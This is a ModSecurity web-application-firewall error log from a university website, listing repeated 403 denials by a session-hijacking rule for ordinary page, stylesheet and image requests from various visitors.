[Mon Aug 28 08:28:49.251299 2023] [:error] [pid 38303] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/login_active2.png"] [unique_id "ZOv4UcCo-f0AAJWfZPIAAAAI"]
[Mon Aug 28 08:28:49.307799 2023] [:error] [pid 38462] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv4UcCo-f0AAJY@On0AAAAB"]
[Mon Aug 28 08:28:49.413049 2023] [:error] [pid 37539] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/login_hover2.png"] [unique_id "ZOv4UcCo-f0AAJKjaK8AAAAG"]
[Mon Aug 28 08:28:49.507654 2023] [:error] [pid 38389] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv4UcCo-f0AAJX1kjMAAAAS"]
[Mon Aug 28 08:29:03.117294 2023] [:error] [pid 38462] [client 114.122.82.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOv4X8Co-f0AAJY@On8AAAAB"]
[Mon Aug 28 08:31:53.783508 2023] [:error] [pid 38386] [client 125.164.18.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5CcCo-f0AAJXyN9gAAAAM"]
[Mon Aug 28 08:31:54.090936 2023] [:error] [pid 38389] [client 125.164.19.70] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5CsCo-f0AAJX1kjgAAAAS"]
[Mon Aug 28 08:32:00.592063 2023] [:error] [pid 38338] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv5EMCo-f0AAJXCvxEAAAAJ"]
[Mon Aug 28 08:32:00.892093 2023] [:error] [pid 38498] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5EMCo-f0AAJZiBSQAAAAA"]
[Mon Aug 28 08:32:01.015126 2023] [:error] [pid 38499] [client 125.164.17.227] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5EcCo-f0AAJZjv4IAAAAC"]
[Mon Aug 28 08:32:01.089260 2023] [:error] [pid 38498] [client 125.164.20.124] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5EcCo-f0AAJZiBSUAAAAA"]
[Mon Aug 28 08:32:10.658751 2023] [:error] [pid 38386] [client 125.164.16.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5GsCo-f0AAJXyN9oAAAAM"]
[Mon Aug 28 08:32:10.736388 2023] [:error] [pid 38498] [client 125.164.21.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5GsCo-f0AAJZiBSYAAAAA"]
[Mon Aug 28 08:32:15.377481 2023] [:error] [pid 38114] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5H8Co-f0AAJTinmAAAAAE"]
[Mon Aug 28 08:32:15.705688 2023] [:error] [pid 38303] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5H8Co-f0AAJWfZPcAAAAI"]
[Mon Aug 28 08:32:25.730552 2023] [:error] [pid 38499] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5KcCo-f0AAJZjv4MAAAAC"]
[Mon Aug 28 08:32:25.880737 2023] [:error] [pid 38498] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5KcCo-f0AAJZiBScAAAAA"]
[Mon Aug 28 08:32:30.168192 2023] [:error] [pid 37539] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv5LsCo-f0AAJKjaLMAAAAG"]
[Mon Aug 28 08:32:31.634670 2023] [:error] [pid 38499] [client 125.164.23.211] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOv5L8Co-f0AAJZjv4UAAAAC"]
[Mon Aug 28 08:32:33.719422 2023] [:error] [pid 37539] [client 125.164.23.211] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv5McCo-f0AAJKjaLQAAAAG"]
[Mon Aug 28 08:32:33.915130 2023] [:error] [pid 38386] [client 125.164.18.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5McCo-f0AAJXyN9sAAAAM"]
[Mon Aug 28 08:32:41.291368 2023] [:error] [pid 38500] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5OcCo-f0AAJZkdi0AAAAD"]
[Mon Aug 28 08:32:41.969362 2023] [:error] [pid 38498] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5OcCo-f0AAJZiBSkAAAAA"]
[Mon Aug 28 08:32:42.146879 2023] [:error] [pid 37539] [client 114.122.73.147] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5OsCo-f0AAJKjaLUAAAAG"]
[Mon Aug 28 08:32:42.288732 2023] [:error] [pid 38379] [client 114.122.73.147] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5OsCo-f0AAJXrIucAAAAP"]
[Mon Aug 28 08:32:44.672774 2023] [:error] [pid 38500] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv5PMCo-f0AAJZkdi8AAAAD"]
[Mon Aug 28 08:32:44.678298 2023] [:error] [pid 38498] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv5PMCo-f0AAJZiBSoAAAAA"]
[Mon Aug 28 08:32:44.706743 2023] [:error] [pid 37539] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv5PMCo-f0AAJKjaLYAAAAG"]
[Mon Aug 28 08:32:45.287730 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv5PcCo-f0AAJTinmEAAAAE"]
[Mon Aug 28 08:32:46.350908 2023] [:error] [pid 38389] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv5PsCo-f0AAJX1kj0AAAAS"]
[Mon Aug 28 08:32:47.040831 2023] [:error] [pid 38379] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5P8Co-f0AAJXrIugAAAAP"]
[Mon Aug 28 08:32:47.217012 2023] [:error] [pid 37539] [client 112.215.210.122] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5P8Co-f0AAJKjaLcAAAAG"]
[Mon Aug 28 08:33:27.608158 2023] [:error] [pid 37539] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5Z8Co-f0AAJKjaLwAAAAG"]
[Mon Aug 28 08:33:29.659812 2023] [:error] [pid 37539] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5acCo-f0AAJKjaMMAAAAG"]
[Mon Aug 28 08:33:37.078591 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv5ccCo-f0AAJTinn8AAAAE"]
[Mon Aug 28 08:33:37.092979 2023] [:error] [pid 38059] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv5ccCo-f0AAJSr29EAAAAO"]
[Mon Aug 28 08:33:37.094761 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv5ccCo-f0AAJTinoAAAAAE"]
[Mon Aug 28 08:33:37.094794 2023] [:error] [pid 38499] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv5ccCo-f0AAJZjv6QAAAAC"]
[Mon Aug 28 08:33:37.095367 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv5ccCo-f0AAJX1kloAAAAS"]
[Mon Aug 28 08:33:37.182948 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5ccCo-f0AAJX1klsAAAAS"]
[Mon Aug 28 08:33:39.064782 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv5c8Co-f0AAJXrIwQAAAAP"]
[Mon Aug 28 08:33:39.064822 2023] [:error] [pid 38059] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv5c8Co-f0AAJSr29kAAAAO"]
[Mon Aug 28 08:33:39.099684 2023] [:error] [pid 38389] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv5c8Co-f0AAJX1kmAAAAAS"]
[Mon Aug 28 08:33:39.100258 2023] [:error] [pid 37539] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv5c8Co-f0AAJKjaM0AAAAG"]
[Mon Aug 28 08:33:39.250829 2023] [:error] [pid 38499] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv5c8Co-f0AAJZjv6oAAAAC"]
[Mon Aug 28 08:33:56.123168 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5hMCo-f0AAJXrIzAAAAAP"]
[Mon Aug 28 08:33:56.200821 2023] [:error] [pid 38499] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5hMCo-f0AAJZjv7kAAAAC"]
[Mon Aug 28 08:34:03.565278 2023] [:error] [pid 38114] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv5i8Co-f0AAJTinrQAAAAE"]
[Mon Aug 28 08:34:03.616233 2023] [:error] [pid 37539] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5i8Co-f0AAJKjaQQAAAAG"]
[Mon Aug 28 08:34:13.002842 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv5lcCo-f0AAJXrI1gAAAAP"]
[Mon Aug 28 08:34:13.179068 2023] [:error] [pid 38059] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5lcCo-f0AAJSr3CYAAAAO"]
[Mon Aug 28 08:34:37.856026 2023] [:error] [pid 38386] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv5rcCo-f0AAJXyOH8AAAAM"]
[Mon Aug 28 08:34:37.878839 2023] [:error] [pid 38114] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv5rcCo-f0AAJTinvwAAAAE"]
[Mon Aug 28 08:34:37.897727 2023] [:error] [pid 38502] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv5rcCo-f0AAJZmo4YAAAAA"]
[Mon Aug 28 08:34:37.899052 2023] [:error] [pid 38500] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv5rcCo-f0AAJZkdnQAAAAD"]
[Mon Aug 28 08:34:37.899126 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv5rcCo-f0AAJXrI38AAAAP"]
[Mon Aug 28 08:34:37.907204 2023] [:error] [pid 38114] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv5rcCo-f0AAJTinv0AAAAE"]
[Mon Aug 28 08:34:37.907988 2023] [:error] [pid 38065] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv5rcCo-f0AAJSxZFAAAAAH"]
[Mon Aug 28 08:34:37.931853 2023] [:error] [pid 38499] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv5rcCo-f0AAJZjwBYAAAAC"]
[Mon Aug 28 08:34:37.955206 2023] [:error] [pid 38502] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv5rcCo-f0AAJZmo4cAAAAA"]
[Mon Aug 28 08:34:37.956786 2023] [:error] [pid 38386] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv5rcCo-f0AAJXyOIAAAAAM"]
[Mon Aug 28 08:34:37.956888 2023] [:error] [pid 38065] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv5rcCo-f0AAJSxZFEAAAAH"]
[Mon Aug 28 08:34:37.965006 2023] [:error] [pid 38379] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv5rcCo-f0AAJXrI4AAAAAP"]
[Mon Aug 28 08:34:37.966723 2023] [:error] [pid 38500] [client 111.94.81.128] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv5rcCo-f0AAJZkdnUAAAAD"]
